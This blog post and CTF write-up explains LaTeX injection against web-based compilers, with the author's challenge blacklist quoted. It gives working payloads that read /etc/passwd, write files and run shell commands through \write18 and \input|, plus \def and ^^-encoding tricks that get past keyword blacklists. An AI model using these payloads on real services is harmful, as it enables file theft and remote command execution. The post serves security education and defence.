Hacking with LaTeX
In this blogpost I want to outline basic attacks against web-based LaTeX compilers. The topic also inspired me to create the Web90 - TexMaker challenge.
TexMaker was a simple website where one could enter LaTeX code and the server would create a PDF file using pdflatex. You'll find similar services on the internet. Unfortunately, user input should never be trusted and LaTeX code is no exception to this rule.
That's because LaTeX is Turing complete, which means that you can write functioning programs with it - I'm still waiting for the first malware written in LaTeX sent as an attachment in phishing mails :)
However, I want to focus on existing ways to read, write or execute arbitrary files with LaTeX. This blogpost tries to be an extension to this paper. Some packages like TikZ need to call external programs to work properly. Therefore pdflatex comes with three operation modes:
-no-shell-escape
Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.
-shell-restricted
Same as -shell-escape, but limited to a 'safe' set of predefined commands.
-shell-escape
Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.
With \write18 you write to output stream 18. pdflatex does not map this stream to a file; it passes whatever is written there to the shell as a command.
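Which of the three modes a service runs in can be probed from inside a document. The following is a minimal sketch that relies on the pdfTeX primitive \pdfshellescape; it assumes the document is compiled with pdflatex, since other engines expose this value differently:

```latex
\documentclass{article}
\begin{document}
% \pdfshellescape is a read-only pdfTeX integer:
% 0 = disabled, 1 = unrestricted, 2 = restricted
\ifcase\pdfshellescape
  Shell escape is disabled.%
\or
  Shell escape is fully enabled.%
\or
  Shell escape is restricted.%
\fi
\end{document}
```

The resulting PDF contains exactly one of the three sentences, so the check works even when the compilation log is not visible.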
You can try all the following examples at papeeria.com. I've notified them of the potential risks and they replied:
Hello Sebastian,
thanks for being pro-active! Yes, we run tex compiler with --shell-escape. However, every compile cycle runs in its own Docker container which is isolated from the host system and from other containers. So, users can do whatever they want, even try to run rm -rf / but the effect of their actions will apply to their one-time container only.
Update (10.03.16, 15:20): I want to clarify that this is not intended to show Papeeria up. I think that their setup with Docker and a non-privileged user is solid. I haven't tried to escape the Docker container, but if you're aware of a way to accomplish this, please email contact [a/t] papeeria dot com.
Reading files
All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input:
\input{/etc/passwd}
This will load the contents of the /etc/passwd file into the PDF file.
If the included file happens to end with .tex, \include can be used:
\include{password}
This will include password.tex from the current working directory.
If the above commands are filtered or blocked by a blacklist, the following workarounds can be used. The first one reads only the first line:
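\newread\file
\openin\file=/etc/passwd
% \fileline instead of \line, so LaTeX's own \line macro is not overwritten
\read\file to\fileline
% \text is provided by amsmath (\usepackage{amsmath})
\text{\fileline}
\closein\file
We create a new \file handle and open the file /etc/passwd for reading. Then we read one line into the \fileline variable, output it as text (\text) and finally close the handle.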
Usually files have multiple lines and the following code handles that:
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
It loops over all lines until it reaches EOF.
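Lines containing characters such as _ or # break the \read loop, so a verbatim reader can be more robust. This is only a sketch and assumes the verbatim package is available on the server, which nothing in the challenge setup confirms:

```latex
\documentclass{article}
\usepackage{verbatim}
\begin{document}
% Typesets the file exactly as it is, special characters included
\verbatiminput{/etc/passwd}
\end{document}
```

Note that the command name contains the string input, so a keyword filter for input would catch it.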
What could an attacker do with this?
- Read sensitive files (e.g. SSH private keys, configuration files, ...)
Writing files
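Another interesting thing is writing data. Contrary to what one might expect, this does not depend on write18: \openout and \write are ordinary TeX primitives and work in every mode. What limits them is the openout_any setting in texmf.cnf, which in TeX Live's default paranoid mode (p) refuses dotfiles, parent directories and absolute paths outside $TEXMFOUTPUT. Writing can be done with the following set of commands: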
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
This writes the string Hello-world into cmd.tex.
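LaTeX also ships a higher-level way to create files, the filecontents* environment. The following is a minimal sketch, assuming a standard LaTeX kernel; placing the environment before \documentclass works on old and new releases alike, and by default it does not overwrite a file that already exists:

```latex
% Writes the body verbatim to cmd.tex without using \openout or \write
\begin{filecontents*}{cmd.tex}
Hello-world
\end{filecontents*}
\documentclass{article}
\begin{document}
% Read the freshly written file back in
\input{cmd.tex}
\end{document}
```

The starred form is used because the unstarred filecontents environment prepends comment lines to the file it writes.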
What could an attacker do with this?
- Delete a file's content by writing nothing to it.
- Overwrite files with foreign data (e.g. ~/.ssh/authorized_keys)
Executing commands
Let's get to the most interesting part of this blogpost. This only works with write18 enabled, which means that -shell-escape has to be set.
The simplest way to execute commands is:
\immediate\write18{env}
This runs the env command.
Its output, however, only goes to stdout, i.e. into the compilation log:
(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))engine=pdftex
SELFAUTODIR=/usr
SELFAUTOGRANDPARENT=/
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
SELFAUTOPARENT=/
SELFAUTOLOC=/usr/bin
_=/usr/sbin/env
PWD=/var/www/ctf.internetwache.org.local/compile
LANG=de_DE.UTF8
progname=pdflatex
SHLVL=2
But that won't help us if we don't see the compilation log. A way to work around this limitation is to write stdout to a file and read it again:
\immediate\write18{env > output}
\input{output}
Reading the env output back in will most likely throw an error, because it contains LaTeX special characters such as the underscore:
(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg)) (./test.tex
! Missing $ inserted.
<inserted text>
$
l.7 _
=/usr/sbin/env
?
! Emergency stop.
<inserted text>
$
l.7 _
=/usr/sbin/env
! ==> Fatal error occurred, no output PDF file produced!
A workaround for that is to base64 encode the output:
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
You can use the \input command to do both steps at once:
\input|ls
or
\input|ls|base64
I don't think that I have to elaborate on how an attacker could do harm by executing commands.
Bypassing blacklists
During the Internetwache CTF 2016, I used the following blacklist:
if(preg_match("(input|include)", $CONTENT)) {
echo 'BLACKLISTED commands used';
} else {
With the newly acquired knowledge you should be able to come up with a bypass. For example this one:
\immediate\write18{ls|base64 > test.txt}
\newread\file
\openin\file=test.txt
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
We write the command's output to test.txt and read it line by line.
Okay, cool, but can we bypass the following blacklist?
"(input|include|write18|immediate)"
Yes, we can! \def lets us assemble the filtered keywords from harmless fragments, and a temporary file lets us read the output:
\def \imm {\string\imme}
\def \diate {diate}
\def \eighteen {\string18}
\def \wwrite {\string\write\eighteen}
\def \args {\string{ls |base64> test.tex\string}}
\def \inp {\string\in}
\def \iput {put}
\def \cmd {\string{test.tex\string}}
% First run
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{\imm\diate\wwrite\args}
\write\outfile{\inp\iput\cmd}
\closeout\outfile
% Second run
\newread\file
\openin\file=cmd.tex
\loop\unless\ifeof\file
\read\file to\fileline
\fileline
\repeat
\closein\file
This time you need to run the compilation two times:
- First run: Create cmd.tex with the actual exploit code. cmd.tex's content:
\immediate\write18{ls |base64> test.tex}
\input{test.tex}
- Second run: Read cmd.tex and execute commands.
This works because expanding \fileline executes whatever line was just read from the temporary cmd.tex file.
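If the blacklist does not contain the immediate keyword, you can replace the first block with the following one to execute the command and read the output in a single run:
% Write cmd.tex right away instead of waiting for a page to be shipped out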
\newwrite\outfile
\immediate\openout\outfile=cmd.tex
\immediate\write\outfile{\imm\diate\wwrite\args}
\immediate\write\outfile{\inp\iput\cmd}
\immediate\closeout\outfile
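The keyword filters above match on the literal source text, while TeX decodes its ^^ hex notation before it looks up a command name. The following sketch was not part of the challenge; it assumes the default category codes, under which ^ is still the superscript character, and -shell-escape for the second command:

```latex
\documentclass{article}
\begin{document}
% ^^70 is the character with hex code 70, i.e. "p",
% so TeX reads \in^^70ut as \input
\in^^70ut{/etc/passwd}
% ^^65 is "e" and ^^69 is "i":
% this line is \immediate\write18{ls > test.txt}
\imm^^65diate\wr^^69te18{ls > test.txt}
\end{document}
```

Neither line contains the strings input, immediate or write18, so both regular expressions shown above let the document through.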
Conclusion
These attacks can end badly for web-based LaTeX compilers as well as for you. Never compile LaTeX code from an untrusted source.
Another thing you should have learned is that blacklists are a weak defense: someone will eventually find a bypass.